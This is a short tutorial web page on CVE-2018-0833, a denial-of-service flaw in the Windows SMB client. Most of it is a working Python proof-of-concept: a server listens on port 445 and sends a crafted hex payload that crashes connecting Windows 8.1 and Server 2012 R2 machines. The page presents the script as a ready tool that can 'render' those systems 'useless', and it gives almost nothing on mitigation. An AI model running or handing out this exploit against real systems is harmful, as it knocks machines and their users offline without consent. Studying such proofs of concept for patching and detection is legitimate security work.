<tutorialjinni.com/>

SMBv3 Null Dereference Denial of Service Vulnerability (CVE-2018-0833)

CVE-2018-0833 is the new vulnerability in Microsoft windows Server Message Block (SMB) version 2 and 3 client. This simple vulnerability mount a Denial of Service (DOS) attack on Windows 8.1 (x86) and Windows Server 2012 R2 (x64) with just single packet.

SMBv3 Null Dereference DOS (CVE-2018-0833) POC

This simple python proof of concept code can render Windows 8.1 and Windows Server 2012 useless with just single packet.
import SocketServer  
from binascii import unhexlify  
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'  
class byebye(SocketServer.BaseRequestHandler):  
        def handle(self):
                try:
                        print "From:", self.client_address
                        print "[*]Sending Payload..."
                        self.request.send(unhexlify(payload))
                except Exception:
                        print "BSoD Triggered on", self.client_address
                        pass
SocketServer.TCPServer.allow_reuse_address = 1  
launch = SocketServer.TCPServer(('', 445),byebye)  
launch.serve_forever()  

CVE-2018-0833 Demonstration Video

More information can be found here.
© Tutorial Jinni